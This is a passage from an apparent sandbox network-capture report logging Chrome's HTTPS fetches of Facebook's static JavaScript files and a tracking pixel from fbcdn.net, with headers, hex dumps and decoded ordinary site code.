                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1715INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC54INData Raw: 32 62 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2bGIF89a!,D;0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                46192.168.2.449799157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC374OUTGET /rsrc.php/v3/y-/r/v87V0xuYr4I.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: rDEOmqaAM5ZkPMcF0pIIHw==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 16:53:39 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: pLpXzYEtVYy6V3WOt8MDCnZAVTlGLDFH/BW57mbq2k+grVvsIBnMvfK5NunfxSB5qG6FGj0DkaFbgrdYxFPAMQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:21 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 5493
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC5492INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 49 6e 74 6c 43 4c 44 52 4e 75 6d 62 65 72 54 79 70 65 30 33 22 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 7b 67 65 74 56 61 72 69 61 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3d 3d 3d 30 7c 7c 61 3d 3d 3d 31 29 72 65 74 75 72 6e 20 63 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 29 2e 4e 55 4d 42 45 52 5f 4f 4e 45 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 63 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 29 2e 4e 55 4d 42 45 52 5f 4f 54 48 45 52 7d 7d 3b 62 3d 61 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("IntlCLDRNumberType03",["IntlVariations"],(function(a,b,c,d,e,f,g){"use strict";a={getVariation:function(a){if(a===0||a===1)return c("IntlVariations").NUMBER_ONE;else return c("IntlVariations").NUMBER_OTHER}};b=a;g["default"]=b}),98)


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                47192.168.2.449795157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC581OUTGET /rsrc.php/v3/yT/r/wc_C9ZEewR3.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: MNmf+dATD/FezUb5xIFrpg==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 18:49:06 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: oXKJfhzoWxN/Y1MUAUik2MkwdsOkekGDQVV/S0KxWyhqFhZW3TRZyj5bJ6YcaBAy7EGk6xAzbhpwTo85NmfgLg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:21 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 45002
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC15871INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 63 74 6f 72 55 52 49 22 2c 5b 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 2c 22 55 52 49 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 68 7c 7c 28 68 3d 63 28 22 55 52 49 22 29 29 29 28 61 29 2e 61 64 64 51 75 65 72 79 44 61 74 61 28 63 28 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 29 2e 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 2c 62 29 7d 67 2e 63 72 65 61 74 65 3d 61 3b 67 2e 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 3d 63 28 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 29 2e 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 7d 29 2c
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("ActorURI",["ActorURIConfig","URI"],(function(a,b,c,d,e,f,g){var h;function a(a,b){return new(h||(h=c("URI")))(a).addQueryData(c("ActorURIConfig").PARAMETER_ACTOR,b)}g.create=a;g.PARAMETER_ACTOR=c("ActorURIConfig").PARAMETER_ACTOR}),
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC16384INData Raw: 2e 66 6c 61 74 74 65 6e 54 6f 41 72 72 61 79 28 29 3a 61 7d 29 2c 64 3d 62 28 22 66 6c 61 74 74 65 6e 41 72 72 61 79 22 29 28 64 29 29 3b 72 65 74 75 72 6e 20 62 28 22 63 72 3a 36 31 31 34 22 29 2e 63 72 65 61 74 65 28 61 2c 63 2c 64 29 7d 3b 67 5b 61 5d 3d 63 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 67 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 4c 69 6e 6b 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 5b 22 44 61 74 61 53 74 6f 72 65 22 2c 22 45 76 65 6e 74 22 2c 22 50 61 72 65 6e 74 22 2c 22 72 65 6d 6f 76 65 46 72 6f 6d 41 72 72 61 79 22 2c 22 74 72 61 63 6b 52 65 66 65 72 72 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 22 40 40 4c 69 6e 6b 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 69 3d 5b 5d 2c 6a 3d 5b
                                                                                                                                                                                                                                Data Ascii: .flattenToArray():a}),d=b("flattenArray")(d));return b("cr:6114").create(a,c,d)};g[a]=c});e.exports=g}),null);__d("LinkController",["DataStore","Event","Parent","removeFromArray","trackReferrer"],(function(a,b,c,d,e,f,g){var h="@@LinkController",i=[],j=[
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC12746INData Raw: 49 6e 73 74 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 3b 77 68 69 6c 65 28 61 29 7b 76 61 72 20 65 3d 64 28 22 44 61 74 61 53 74 6f 72 65 22 29 2e 67 65 74 28 61 2c 22 74 6f 67 67 6c 65 72 22 29 3b 69 66 28 65 29 72 65 74 75 72 6e 20 65 3b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 29 69 66 28 64 28 22 43 53 53 22 29 2e 68 61 73 43 6c 61 73 73 28 61 2c 22 75 69 54 6f 67 67 6c 65 43 6f 6e 74 65 78 74 22 29 29 72 65 74 75 72 6e 20 62 2e 63 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 61 29 3b 65 6c 73 65 20 69 66 28 21 63 28 22 6b 69 6c 6c 73 77 69 74 63 68 22 29 28 22 4a 45 57 45 4c 5f 54 4f 47 47 4c 45 52 5f 49 4e 53 54 41 4e 43 45 5f 46 49 58 45 53 22 29 26 26 64 28 22 43 53 53 22 29 2e 68 61 73 43 6c 61 73 73 28
                                                                                                                                                                                                                                Data Ascii: Instance=function(a){a=a;while(a){var e=d("DataStore").get(a,"toggler");if(e)return e;if(a instanceof Element)if(d("CSS").hasClass(a,"uiToggleContext"))return b.createInstance(a);else if(!c("killswitch")("JEWEL_TOGGLER_INSTANCE_FIXES")&&d("CSS").hasClass(


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                48192.168.2.449798157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC374OUTGET /rsrc.php/v3/yr/r/OJuPnvrkEfZ.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: yF/Bm975u33ArWnQvO8H2A==
                                                                                                                                                                                                                                Expires: Wed, 24 Sep 2025 14:52:14 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: CVFWG0CMS6GUHcs5xAlRnV7Aj1ccrJQbJ0fQVx5P6Ncixeg9Vb3YG+MN8glcw+ktqdNk0nNaeAHRevp+wgTwHA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:21 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=95, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 2078
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC2048INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 44 65 66 65 72 72 65 64 22 2c 5b 22 50 72 6f 6d 69 73 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 3b 28 67 7c 7c 28 67 3d 62 28 22 50 72 6f 6d 69 73 65 22 29 29 29 2e 72 65 73 6f 6c 76 65 28 29 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 61 3d 61 7c 7c 67 7c 7c 28 67 3d 62 28 22 50 72 6f 6d 69 73 65 22 29 29 3b 74 68 69 73 2e 24 31 3d 21 31 3b 74 68 69 73 2e 24 32 3d 6e 65 77 20 61 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 2e 24 33 3d 61 2c 63 2e 24 34 3d 62 7d 29 7d 76 61 72 20 63 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("Deferred",["Promise"],(function(a,b,c,d,e,f){"use strict";var g;(g||(g=b("Promise"))).resolve();a=function(){function a(a){var c=this;a=a||g||(g=b("Promise"));this.$1=!1;this.$2=new a(function(a,b){c.$3=a,c.$4=b})}var c=a.prototype;
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC29INData Raw: 65 74 75 72 6e 20 61 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b
                                                                                                                                                                                                                                Data Ascii: eturn a}g["default"]=a}),98);


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                49192.168.2.449794157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC581OUTGET /rsrc.php/v3/y8/r/fCWCnWQldVh.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: a5N7LjU0LqOqa0IWOh0OgA==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 22:02:32 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: z+eUsXJGlRWIQlFPi4xhesUYmok1gLRcGte9QJV++PV37y+9Xv9TwwUdfwo6lNmiOUoidz1QhujrlQVHGokvIw==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:21 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 10762
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC10761INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 75 74 74 6f 6e 22 2c 5b 22 63 73 78 22 2c 22 63 78 22 2c 22 69 6e 76 61 72 69 61 6e 74 22 2c 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 44 61 74 61 53 74 6f 72 65 22 2c 22 45 76 65 6e 74 22 2c 22 50 61 72 65 6e 74 22 2c 22 65 6d 70 74 79 46 75 6e 63 74 69 6f 6e 22 2c 22 69 73 4e 6f 64 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 22 75 69 42 75 74 74 6f 6e 44 69 73 61 62 6c 65 64 22 2c 6c 3d 22 75 69 42 75 74 74 6f 6e 44 65 70 72 65 73 73 65 64 22 2c 6d 3d 22 5f 34 32 66 72 22 2c 6e 3d 22 5f 34 32 66 73 22 2c 6f 3d 22 62 75 74 74 6f 6e 3a 62 6c 6f 63 6b 65 72 22 2c 70 3d 22 68 72 65 66 22 2c 71 3d 22 61 6a 61 78
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("Button",["csx","cx","invariant","CSS","DOM","DataStore","Event","Parent","emptyFunction","isNode"],(function(a,b,c,d,e,f,g,h,i,j){var k="uiButtonDisabled",l="uiButtonDepressed",m="_42fr",n="_42fs",o="button:blocker",p="href",q="ajax


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                50192.168.2.449793157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC581OUTGET /rsrc.php/v3/yT/r/DHWoESmf_2P.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: BOsB5wO8Yj0/bkLXEdvZCA==
                                                                                                                                                                                                                                Expires: Sat, 20 Sep 2025 08:42:58 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
